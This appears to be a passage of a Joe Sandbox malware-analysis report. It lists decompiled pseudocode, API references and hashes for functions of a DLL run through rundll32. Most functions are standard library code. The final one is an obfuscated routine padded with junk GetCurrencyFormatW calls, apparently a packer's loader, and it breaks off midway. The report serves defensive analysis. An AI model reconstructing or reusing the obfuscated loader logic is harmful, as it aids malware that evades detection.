												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E10005C93(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E10004EB7(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E1001FBB5(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}






















                                                                                                            0x10011c86
                                                                                                            0x10011c86
                                                                                                            0x10011c86
                                                                                                            0x10011c8d
                                                                                                            0x10011c91
                                                                                                            0x10011c98
                                                                                                            0x10011c9e
                                                                                                            0x10011ca5
                                                                                                            0x10011cb0
                                                                                                            0x10011cb6
                                                                                                            0x10011cbc
                                                                                                            0x10011cc1
                                                                                                            0x10011cc6
                                                                                                            0x10011cc8
                                                                                                            0x10011cca
                                                                                                            0x10011cca
                                                                                                            0x10011cca
                                                                                                            0x10011cd8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011ce6
                                                                                                            0x10011cee
                                                                                                            0x10011d0d
                                                                                                            0x10011d0f
                                                                                                            0x00000000
                                                                                                            0x10011d11
                                                                                                            0x10011d1a
                                                                                                            0x10011d1f
                                                                                                            0x10011d28
                                                                                                            0x10011d30
                                                                                                            0x10011d36
                                                                                                            0x10011d38
                                                                                                            0x10011dca
                                                                                                            0x10011dd0
                                                                                                            0x10011dd7
                                                                                                            0x10011dd7
                                                                                                            0x10011d3e
                                                                                                            0x10011d4e
                                                                                                            0x10011d54
                                                                                                            0x10011d56
                                                                                                            0x10011d6e
                                                                                                            0x10011d72
                                                                                                            0x10011d75
                                                                                                            0x10011d75
                                                                                                            0x10011d7b
                                                                                                            0x10011d7f
                                                                                                            0x00000000
                                                                                                            0x10011d81
                                                                                                            0x10011d86
                                                                                                            0x10011d8c
                                                                                                            0x10011d8f
                                                                                                            0x00000000
                                                                                                            0x10011d91
                                                                                                            0x10011d92
                                                                                                            0x10011d98
                                                                                                            0x10011d9c
                                                                                                            0x00000000
                                                                                                            0x10011d9e
                                                                                                            0x10011d9e
                                                                                                            0x10011da1
                                                                                                            0x00000000
                                                                                                            0x10011da3
                                                                                                            0x10011da7
                                                                                                            0x10011db0
                                                                                                            0x10011db4
                                                                                                            0x10011db6
                                                                                                            0x00000000
                                                                                                            0x10011db8
                                                                                                            0x10011dbc
                                                                                                            0x10011dbc
                                                                                                            0x10011dc2
                                                                                                            0x00000000
                                                                                                            0x10011dc7
                                                                                                            0x10011db6
                                                                                                            0x10011da1
                                                                                                            0x10011d9c
                                                                                                            0x10011d8f
                                                                                                            0x10011d58
                                                                                                            0x10011d58
                                                                                                            0x10011d5c
                                                                                                            0x10011d61
                                                                                                            0x10011d67
                                                                                                            0x00000000
                                                                                                            0x10011d67
                                                                                                            0x10011d56
                                                                                                            0x10011d38
                                                                                                            0x10011cf0
                                                                                                            0x10011cf5
                                                                                                            0x10011cfd
                                                                                                            0x10011d01
                                                                                                            0x10011d06
                                                                                                            0x10011d06
                                                                                                            0x10011d06
                                                                                                            0x10011ddb
                                                                                                            0x10011de3
                                                                                                            0x10011de4
                                                                                                            0x10011de5
                                                                                                            0x10011dfa

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10011CA5
                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 10011CE6
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • PathIsUNCA.SHLWAPI(?,00000000), ref: 10011D30
                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 10011D4E
                                                                                                            • CharUpperA.USER32(?), ref: 10011D75
                                                                                                            • FindFirstFileA.KERNEL32(?,00000000), ref: 10011D86
                                                                                                            • FindClose.KERNEL32(00000000), ref: 10011D92
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10011DA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4099955704-0
                                                                                                            • Opcode ID: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
                                                                                                            • Instruction ID: 71c2b450ac2c88f27229685b2eaf748cff0cdd07423a00f921b144b935e16ce8
                                                                                                            • Opcode Fuzzy Hash: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
                                                                                                            • Instruction Fuzzy Hash: E841CD71A0014AAFEB15DBB4CC89AFF77BCEF44355F010529F915EA192EB30E984CA60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100037A6 Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E100037A6(void* __ecx, void* __edx) {
				signed int _v8;
				int _v88;
				char _v92;
				struct tagRECT _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t18;
				void* _t19;
				int _t23;
				int _t24;
				void* _t40;
				void* _t48;
				void* _t49;
				void* _t52;
				signed int _t53;

				_t48 = __edx;
				_t16 =  *0x10045580; // 0x6a53a566
				_v8 = _t16 ^ _t53;
				_t52 = __ecx;
				_t18 = IsIconic( *(__ecx + 0x20));
				_t54 = _t18;
				if(_t18 == 0) {
					_t19 = E10007997(_t40, _t52, _t49, _t52, __eflags);
				} else {
					_push(_t40);
					E1001017C(_t40,  &_v92, _t49, _t52, _t54);
					SendMessageA( *(_t52 + 0x20), 0x27, _v88, 0);
					_t23 = GetSystemMetrics(0xb);
					_t24 = GetSystemMetrics(0xc);
					GetClientRect( *(_t52 + 0x20),  &_v108);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v88, _v108.right - _v108.left - _t23 + 1 - _t48 >> 1, _v108.bottom - _v108.top - _t24 + 1 - _t48 >> 1,  *(_t52 + 0x11c));
					_t19 = E100101D0(_t23,  &_v92, _t24, _t52, _t54);
					_t49 = _t52;
					_t40 = _t49;
				}
				return E1001FBB5(_t19, _t40, _v8 ^ _t53, _t48, _t49, _t52);
			}





















                                                                                                            0x100037a6
                                                                                                            0x100037ac
                                                                                                            0x100037b3
                                                                                                            0x100037b7
                                                                                                            0x100037bc
                                                                                                            0x100037c2
                                                                                                            0x100037c4
                                                                                                            0x1000383b
                                                                                                            0x100037c6
                                                                                                            0x100037c6
                                                                                                            0x100037cc
                                                                                                            0x100037db
                                                                                                            0x100037e9
                                                                                                            0x100037ef
                                                                                                            0x100037fa
                                                                                                            0x1000380f
                                                                                                            0x1000381e
                                                                                                            0x10003827
                                                                                                            0x10003830
                                                                                                            0x10003835
                                                                                                            0x10003836
                                                                                                            0x10003836
                                                                                                            0x1000384c

                                                                                                            APIs
                                                                                                            • IsIconic.USER32 ref: 100037BC
                                                                                                              • Part of subcall function 1001017C: __EH_prolog3.LIBCMT ref: 10010183
                                                                                                              • Part of subcall function 1001017C: BeginPaint.USER32(?,?,00000004,100079AE,?,00000058,10003840), ref: 100101AF
                                                                                                            • SendMessageA.USER32(?,00000027,?,00000000), ref: 100037DB
                                                                                                            • GetSystemMetrics.USER32 ref: 100037E9
                                                                                                            • GetSystemMetrics.USER32 ref: 100037EF
                                                                                                            • GetClientRect.USER32 ref: 100037FA
                                                                                                            • DrawIcon.USER32 ref: 10003827
                                                                                                              • Part of subcall function 100101D0: __EH_prolog3.LIBCMT ref: 100101D7
                                                                                                              • Part of subcall function 100101D0: EndPaint.USER32(?,?,00000004,100079D4,?,?,00000058,10003840), ref: 100101F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2914073315-0
                                                                                                            • Opcode ID: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
                                                                                                            • Instruction ID: d120da58dcfcd53bd7750bb53c5c236feb3430fa3c37942b0e1c20916eef10ca
                                                                                                            • Opcode Fuzzy Hash: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
                                                                                                            • Instruction Fuzzy Hash: 11112131A00219AFDB01DFB8CD499AEBBB9FB49704F004128F546DB165DA60A905CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005CE3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E10005CE3(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10045580; // 0x6a53a566
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E10020E9D(__edx,  &_v288, 4, "LOC"));
					E10001000(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10020B71(_t39));
					 *(E10020B71(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10020F1E( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10020B71(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10020B71(__eflags)) = _t34;
					} else {
						E10005177( *((intOrPtr*)(E10020B71(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E1001FBB5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                            0x10005ce3
                                                                                                            0x10005ce3
                                                                                                            0x10005ce3
                                                                                                            0x10005ce3
                                                                                                            0x10005cec
                                                                                                            0x10005cf3
                                                                                                            0x10005cf6
                                                                                                            0x10005cfe
                                                                                                            0x10005d06
                                                                                                            0x10005d7a
                                                                                                            0x10005d7c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10005d7e
                                                                                                            0x10005d08
                                                                                                            0x10005d15
                                                                                                            0x10005d16
                                                                                                            0x10005d1b
                                                                                                            0x10005d1e
                                                                                                            0x10005d1e
                                                                                                            0x10005d1f
                                                                                                            0x10005d25
                                                                                                            0x10005d2c
                                                                                                            0x10005d3c
                                                                                                            0x10005d51
                                                                                                            0x10005d53
                                                                                                            0x10005d58
                                                                                                            0x10005d5b
                                                                                                            0x10005d85
                                                                                                            0x10005d5d
                                                                                                            0x10005d64
                                                                                                            0x10005d69
                                                                                                            0x10005d8a
                                                                                                            0x10005d9f
                                                                                                            0x10005d9f
                                                                                                            0x10005d90
                                                                                                            0x10005d97
                                                                                                            0x10005d97
                                                                                                            0x10005da1
                                                                                                            0x10005da2
                                                                                                            0x10005da2
                                                                                                            0x10005daf

                                                                                                            APIs
                                                                                                            • _strcpy_s.LIBCMT ref: 10005D10
                                                                                                              • Part of subcall function 10001000: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10001000: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                              • Part of subcall function 10020B71: __getptd_noexit.LIBCMT ref: 10020B71
                                                                                                            • __snprintf_s.LIBCMT ref: 10005D49
                                                                                                              • Part of subcall function 10020F1E: __vsnprintf_s_l.LIBCMT ref: 10020F33
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10005D74
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 10005D97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                            • String ID: LOC
                                                                                                            • API String ID: 4018564869-519433814
                                                                                                            • Opcode ID: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
                                                                                                            • Instruction ID: a9d45852776f355f9b5d50c5a058e6740ec097f8b3d9f9fbd80e36b8e0c44140
                                                                                                            • Opcode Fuzzy Hash: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
                                                                                                            • Instruction Fuzzy Hash: F9113A35900208AFE732D764DC4BBDF76ACDF04396F5104A3F6059B0A6DB716D448661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001FBB5 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E1001FBB5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10045580; // 0x6a53a566
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10048ee8 = _t6;
				 *0x10048ee4 = _t22;
				 *0x10048ee0 = _t25;
				 *0x10048edc = _t21;
				 *0x10048ed8 = _t27;
				 *0x10048ed4 = _t26;
				 *0x10048f00 = ss;
				 *0x10048ef4 = cs;
				 *0x10048ed0 = ds;
				 *0x10048ecc = es;
				 *0x10048ec8 = fs;
				 *0x10048ec4 = gs;
				asm("pushfd");
				_pop( *0x10048ef8);
				 *0x10048eec =  *_t31;
				 *0x10048ef0 = _v0;
				 *0x10048efc =  &_a4;
				 *0x10048e38 = 0x10001;
				_t11 =  *0x10048ef0; // 0x0
				 *0x10048dec = _t11;
				 *0x10048de0 = 0xc0000409;
				 *0x10048de4 = 1;
				_t12 =  *0x10045580; // 0x6a53a566
				_v812 = _t12;
				_t13 =  *0x10045584; // 0x95ac5a99
				_v808 = _t13;
				 *0x10048e30 = IsDebuggerPresent();
				_push(1);
				E1002CAF6(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10039e30);
				if( *0x10048e30 == 0) {
					_push(1);
					E1002CAF6(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbbb
                                                                                                            0x1001fbbd
                                                                                                            0x1001fbbd
                                                                                                            0x10026285
                                                                                                            0x1002628a
                                                                                                            0x10026290
                                                                                                            0x10026296
                                                                                                            0x1002629c
                                                                                                            0x100262a2
                                                                                                            0x100262a8
                                                                                                            0x100262af
                                                                                                            0x100262b6
                                                                                                            0x100262bd
                                                                                                            0x100262c4
                                                                                                            0x100262cb
                                                                                                            0x100262d2
                                                                                                            0x100262d3
                                                                                                            0x100262dc
                                                                                                            0x100262e4
                                                                                                            0x100262ec
                                                                                                            0x100262f7
                                                                                                            0x10026301
                                                                                                            0x10026306
                                                                                                            0x1002630b
                                                                                                            0x10026315
                                                                                                            0x1002631f
                                                                                                            0x10026324
                                                                                                            0x1002632a
                                                                                                            0x1002632f
                                                                                                            0x1002633b
                                                                                                            0x10026340
                                                                                                            0x10026342
                                                                                                            0x1002634a
                                                                                                            0x10026355
                                                                                                            0x10026362
                                                                                                            0x10026364
                                                                                                            0x10026366
                                                                                                            0x1002636b
                                                                                                            0x1002637f

                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 10026335
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1002634A
                                                                                                            • UnhandledExceptionFilter.KERNEL32(10039E30), ref: 10026355
                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 10026371
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 10026378
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2579439406-0
                                                                                                            • Opcode ID: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
                                                                                                            • Instruction ID: 5ceda17ef6beca13f91ed3eb6d695352f2d28ceca655d5ac6984320e078a27cc
                                                                                                            • Opcode Fuzzy Hash: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
                                                                                                            • Instruction Fuzzy Hash: FF21F274810225DFF741EF2ADEC46593BB4FB0A305F40481AEA08CB662E7B15A85CF0D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000ACED Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1000ACED(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E1000EEC4(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000A84C(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10005CAE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}









                                                                                                            0x1000acf0
                                                                                                            0x1000acfc
                                                                                                            0x1000ad44
                                                                                                            0x1000ad46
                                                                                                            0x1000ad4d
                                                                                                            0x00000000
                                                                                                            0x1000ad4f
                                                                                                            0x1000ad03
                                                                                                            0x1000ad07
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ad09
                                                                                                            0x1000ad16
                                                                                                            0x00000000
                                                                                                            0x1000ad2a
                                                                                                            0x1000ad39
                                                                                                            0x00000000
                                                                                                            0x1000ad41

                                                                                                            APIs
                                                                                                              • Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF
                                                                                                            • GetKeyState.USER32(00000010), ref: 1000AD11
                                                                                                            • GetKeyState.USER32(00000011), ref: 1000AD1A
                                                                                                            • GetKeyState.USER32(00000012), ref: 1000AD23
                                                                                                            • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 1000AD39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$LongMessageSendWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1063413437-0
                                                                                                            • Opcode ID: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
                                                                                                            • Instruction ID: eef2aa2a50f2ce3d6a27787399a9e196b8ce042d27520782e3c7ec791ce6f79c
                                                                                                            • Opcode Fuzzy Hash: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
                                                                                                            • Instruction Fuzzy Hash: F9F089B678039B1BF550B2748C41F952154CF4ABD6F010731B643EE4DACD65D8C15670
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003122 Relevance: 59.9, APIs: 32, Strings: 2, Instructions: 377COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10003122(signed int _a4, signed short _a8) {
				signed int _v4;
				void* _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t113;
				signed int _t124;
				intOrPtr _t125;
				int _t129;
				signed int _t130;
				signed int _t133;
				void* _t140;
				signed int _t141;
				void* _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr* _t186;
				signed int _t196;
				signed int _t197;
				short* _t198;
				void* _t238;

				_t238 =  &_v24;
				_t198 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v4;
				_t113 =  *_a4 + 0x78 + (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v4) * 8;
				_v8 = _t113;
				if( *((intOrPtr*)(_t113 + 4)) == 0) {
					L16:
					return 0;
				}
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) * 0x28;
				_v24 = (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) + _v4) *  *0x100440d0 +  *_v8 + _v20;
				if( *(_v24 + 0x18) == GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4) {
					goto L16;
				}
				_t124 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t125 = _v24;
				if( *((intOrPtr*)(_t125 + 0x14)) == _t124 *  *0x100440e0) {
					goto L16;
				}
				_push(0x22b9);
				_push(L"xadqsavcbdfewescGADW");
				_push(0);
				_push(_t198);
				_push(0x11d4);
				_push(0);
				if(_a8 >> 0x10 != 0) {
